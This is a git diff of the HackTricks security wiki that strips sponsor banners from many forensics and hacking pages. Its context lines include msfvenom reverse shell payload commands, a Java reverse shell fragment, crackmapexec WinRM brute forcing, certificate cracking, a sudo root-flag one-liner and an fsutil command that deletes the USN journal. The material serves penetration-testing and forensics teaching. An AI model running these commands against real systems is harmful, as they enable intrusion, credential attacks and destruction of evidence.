- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md b/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md index 9f63fbab3..e51ccb2ea 100644 --- a/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md +++ b/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md @@ -12,3 +12,5 @@ You can read more information and find some scripts about how to analyse this in - [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup) {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md b/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md index 9c3dba419..6bbe7e8ef 100644 --- a/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md +++ b/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md @@ -17,3 +17,5 @@ You can read more information and find some scripts about how to analyse this in - [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup) {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md b/src/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md index 36413cf70..fa4d2edf6 100644 
--- a/src/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md +++ b/src/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md @@ -39,3 +39,5 @@ Edit --> Preferences --> Protocols --> IEEE 802.11--> Edit ![](<../../../images/image (426).png>) {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md index ec397e99a..be52ee567 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md @@ -2,11 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! - -{% embed url="https://go.intigriti.com/hacktricks" %} ## From Compiled Binary to .pyc @@ -223,10 +218,7 @@ C:\Users\test\Desktop\test>pyinstaller --onefile hello.py - [https://blog.f-secure.com/how-to-decompile-any-python-binary/](https://blog.f-secure.com/how-to-decompile-any-python-binary/) -
- -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! - -{% embed url="https://go.intigriti.com/hacktricks" %} {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md index 76fa3ef23..b3cf47a1b 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md @@ -39,3 +39,5 @@ zips-tricks.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md index ba35ea1fd..c1f89d74f 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md @@ -2,14 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - ## Browsers Artifacts Browser artifacts include various types of data stored by web browsers, such as navigation history, bookmarks, and cache data. These artifacts are kept in specific folders within the operating system, differing in location and name across browsers, yet generally storing similar data types. @@ -169,12 +161,6 @@ These paths and commands are crucial for accessing and understanding the browsin - [https://books.google.com/books?id=jfMqCgAAQBAJ\&pg=PA128\&lpg=PA128\&dq=%22This+file](https://books.google.com/books?id=jfMqCgAAQBAJ&pg=PA128&lpg=PA128&dq=%22This+file) - **Book: OS X Incident Response: Scripting and Analysis By Jaron Bradley pag 123** -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md index c22a6f566..4a514defb 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md @@ -48,3 +48,5 @@ End Function ``` {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md index 99792162b..e5a5adf74 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md @@ -2,13 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} ## OneDrive @@ -103,12 +96,6 @@ Other tables inside this database contain more interesting information: - **deleted_fields**: Dropbox deleted files - **date_added** -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md index 34433ce87..0304cb9c0 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md @@ -2,13 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} For further information check [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/). This is just a sumary: @@ -25,12 +18,6 @@ sudo pip3 install -U oletools olevba -c /path/to/document #Extract macros ``` -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md index 79799f2d8..b32d72ddf 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md @@ -2,14 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - **For further details check:** [**https://trailofbits.github.io/ctf/forensics/**](https://trailofbits.github.io/ctf/forensics/) The PDF format is known for its complexity and potential for concealing data, making it a focal point for CTF forensics challenges. It combines plain-text elements with binary objects, which might be compressed or encrypted, and can include scripts in languages like JavaScript or Flash. To understand PDF structure, one can refer to Didier Stevens's [introductory material](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/), or use tools like a text editor or a PDF-specific editor such as Origami. @@ -26,3 +18,5 @@ For in-depth exploration or manipulation of PDFs, tools like [qpdf](https://gith For custom PDF analysis, Python libraries like [PeepDF](https://github.com/jesparza/peepdf) can be used to craft bespoke parsing scripts. Further, the PDF's potential for hidden data storage is so vast that resources like the NSA guide on PDF risks and countermeasures, though no longer hosted at its original location, still offer valuable insights. A [copy of the guide](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf) and a collection of [PDF format tricks](https://github.com/corkami/docs/blob/master/PDF/PDF.md) by Ange Albertini can provide further reading on the subject. {{#include ../../../banners/hacktricks-training.md}} + + 
diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md index 6108df028..d577ba693 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md @@ -7,3 +7,5 @@ For checking PNG file integrity and repairing corruption, **pngcheck** is a cruc These strategies underscore the importance of a comprehensive approach in CTFs, utilizing a blend of analytical tools and repair techniques to uncover and recover hidden or lost data. {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md index a1e143cb0..5ec1db19f 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md @@ -1,10 +1,5 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} **Audio and video file manipulation** is a staple in **CTF forensics challenges**, leveraging **steganography** and metadata analysis to hide or reveal secret messages. Tools such as **[mediainfo](https://mediaarea.net/en/MediaInfo)** and **`exiftool`** are essential for inspecting file metadata and identifying content types. @@ -20,10 +15,7 @@ This array of tools underscores the versatility required in CTF challenges, wher - [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md index d4e17eb0d..cf87f9a6c 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md @@ -19,3 +19,5 @@ It's crucial to note that password-protected zip files **do not encrypt filename - [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/) {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/windows-forensics/README.md b/src/forensics/basic-forensic-methodology/windows-forensics/README.md index 08b2ede8c..b73f8361f 100644 --- a/src/forensics/basic-forensic-methodology/windows-forensics/README.md +++ b/src/forensics/basic-forensic-methodology/windows-forensics/README.md @@ -4,9 +4,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -{% embed url="https://websec.nl/" %} ## Generic Windows Artifacts @@ -507,8 +504,7 @@ EventID 6005 indicates system startup, while EventID 6006 marks shutdown. Security EventID 1102 signals the deletion of logs, a critical event for forensic analysis. -
- -{% embed url="https://websec.nl/" %} {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/src/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md index 840b910bc..c508fab70 100644 --- a/src/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md +++ b/src/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md @@ -99,3 +99,5 @@ This guide condenses the crucial paths and methods for accessing detailed system, network, and user activity information on Windows systems, aiming for clarity and usability. {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md b/src/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md index 06f914970..1451e1daf 100644 --- a/src/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md +++ b/src/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md @@ -104,3 +104,5 @@ This is run from **userinit.exe** which should be terminated, so **no parent** s - Are the children processes the expecting ones? (no cmd.exe, wscript.exe, powershell.exe..?) {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-hacking/brute-force.md b/src/generic-hacking/brute-force.md index 9b2faa122..ab9bffb5d 100644 --- a/src/generic-hacking/brute-force.md +++ b/src/generic-hacking/brute-force.md @@ -1,13 +1,5 @@ # Brute Force - CheatSheet -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %} - {{#include ../banners/hacktricks-training.md}} ## Default Credentials @@ -96,14 +88,6 @@ Finished in 0.920s. - [**https://hashkiller.io/listmanager**](https://hashkiller.io/listmanager) - [**https://github.com/Karanxa/Bug-Bounty-Wordlists**](https://github.com/Karanxa/Bug-Bounty-Wordlists) -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %} - ## Services Ordered alphabetically by service name. @@ -551,13 +535,6 @@ set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst crackmapexec winrm -d -u usernames.txt -p passwords.txt ``` -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %} ## Local @@ -754,14 +731,6 @@ zip -r file.xls . crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx ``` -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %} - ## Tools **Hash examples:** [https://openwall.info/wiki/john/sample-hashes](https://openwall.info/wiki/john/sample-hashes) @@ -905,10 +874,4 @@ Cracking Common Application Hashes {{#include ../banners/hacktricks-training.md}} -
-\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %} diff --git a/src/generic-hacking/exfiltration.md b/src/generic-hacking/exfiltration.md index 2e5c0c1dd..3ba272f2e 100644 --- a/src/generic-hacking/exfiltration.md +++ b/src/generic-hacking/exfiltration.md @@ -365,3 +365,5 @@ Then copy-paste the text into the windows-shell and a file called nc.exe will be - [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil) {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/generic-hacking/reverse-shells/README.md b/src/generic-hacking/reverse-shells/README.md index 9f8253367..1d4a7f319 100644 --- a/src/generic-hacking/reverse-shells/README.md +++ b/src/generic-hacking/reverse-shells/README.md @@ -22,3 +22,5 @@ - [**https://github.com/mthbernardes/rsg**](https://github.com/mthbernardes/rsg) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-hacking/reverse-shells/expose-local-to-the-internet.md b/src/generic-hacking/reverse-shells/expose-local-to-the-internet.md index b52276fda..c174cee6d 100644 --- a/src/generic-hacking/reverse-shells/expose-local-to-the-internet.md +++ b/src/generic-hacking/reverse-shells/expose-local-to-the-internet.md @@ -86,3 +86,5 @@ npx localtunnel --port 8000 ``` {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-hacking/reverse-shells/full-ttys.md b/src/generic-hacking/reverse-shells/full-ttys.md index 32d0eb1d5..23aaebc2b 100644 --- a/src/generic-hacking/reverse-shells/full-ttys.md +++ b/src/generic-hacking/reverse-shells/full-ttys.md @@ -2,12 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} - ## Full TTY Note that the shell you set in the `SHELL` variable **must** be **listed inside** _**/etc/shells**_ or `The value for the SHELL variable was not found in the /etc/shells file This incident has been reported`. Also, note that the next snippets only work in bash. If you're in a zsh, change to a bash before obtaining the shell by running `bash`. @@ -112,10 +106,6 @@ If for some reason you cannot obtain a full TTY you **still can interact with pr expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "";send "\r\n";interact' ``` -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} - {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-hacking/reverse-shells/linux.md b/src/generic-hacking/reverse-shells/linux.md index c1caa101d..f4cad3f87 100644 --- a/src/generic-hacking/reverse-shells/linux.md +++ b/src/generic-hacking/reverse-shells/linux.md @@ -380,3 +380,5 @@ Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new - [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-hacking/reverse-shells/msfvenom.md b/src/generic-hacking/reverse-shells/msfvenom.md index 49444f77b..d0450ec37 100644 --- a/src/generic-hacking/reverse-shells/msfvenom.md +++ b/src/generic-hacking/reverse-shells/msfvenom.md @@ -2,21 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! - -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking - -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights - -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates - -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! - --- ## Basic msfvenom @@ -184,19 +169,6 @@ msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh ``` -
- -Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! - -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking - -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights - -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates - -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! - {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-hacking/reverse-shells/windows.md b/src/generic-hacking/reverse-shells/windows.md index 4bf4f6792..9d9a48dad 100644 --- a/src/generic-hacking/reverse-shells/windows.md +++ b/src/generic-hacking/reverse-shells/windows.md @@ -557,3 +557,5 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive - [https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-hacking/search-exploits.md b/src/generic-hacking/search-exploits.md index 8d195840a..eafcf5a04 100644 --- a/src/generic-hacking/search-exploits.md +++ b/src/generic-hacking/search-exploits.md @@ -2,14 +2,6 @@ {{#include ../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=search-exploits) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=search-exploits" %} - ### Browser Always search in "google" or others: **\ \[version] exploit** @@ -60,12 +52,7 @@ GTFOBins-like curated list of exploits with filters by vulnerability type (Local search_vulns enables you to search for known vulnerabilities and exploits as well: [**https://search-vulns.com/**](https://search-vulns.com/). It utilizes various data sources like the NVD, the Exploit-DB, PoC-in-GitHub, the GitHub Security Advisory database and endoflife.date. -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=search-exploits) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=search-exploits" %} {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/generic-hacking/tunneling-and-port-forwarding.md b/src/generic-hacking/tunneling-and-port-forwarding.md index 902da0e5b..08446fe1d 100644 --- a/src/generic-hacking/tunneling-and-port-forwarding.md +++ b/src/generic-hacking/tunneling-and-port-forwarding.md @@ -651,3 +651,5 @@ tunnels: - [https://github.com/z3APA3A/3proxy](https://github.com/z3APA3A/3proxy) {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md index e725dfa85..531ec98f0 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md @@ -80,3 +80,5 @@ file-integrity-monitoring.md {{#endref}} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md index 94a381b98..9221761a1 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md @@ -151,3 +151,5 @@ It's also possible to modify the configuration of which files are going to be co - `fsutil usn deletejournal /d c:` {{#include ../../banners/hacktricks-training.md}} + + 
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md index 629251985..17a36b6cb 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md @@ -2,11 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} ## Container modification @@ -122,10 +117,7 @@ Note that when you run a docker container inside a host **you can see the proces Therefore (as root) you can **dump the memory of the processes** from the host and search for **credentials** just [**like in the following example**](../../linux-hardening/privilege-escalation/#process-memory). -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md index 214b917cf..a1e4d8502 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md @@ -24,3 +24,5 @@ File Integrity Monitoring (FIM) is a critical security technique that protects I - [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md index a95a3bbff..3c8aae4ac 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md @@ -2,9 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -{% embed url="https://websec.nl/" %} ## Acquisition @@ -114,8 +111,7 @@ Note that sector size is **512** and start is **2048**. Then mount the image lik mount disk.img /mnt -o ro,offset=$((2048*512)) ``` -
- -{% embed url="https://websec.nl/" %} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md index 568da19c5..49acdb9f9 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md @@ -1,13 +1,5 @@ # Linux Forensics -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %} - {{#include ../../banners/hacktricks-training.md}} ## Initial Information Gathering @@ -150,14 +142,6 @@ icat -i raw -f ext4 disk.img 16 ThisisTheMasterSecret ``` -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %} - ## Search for known Malware ### Modified System Files @@ -200,14 +184,6 @@ find /sbin/ –exec rpm -qf {} \; | grep "is not" find / -type f -executable | grep ``` -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %} - ## Recover Deleted Running Binaries Imagine a process that was executed from /tmp/exec and then deleted. It's possible to extract it @@ -343,14 +319,6 @@ usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip) -
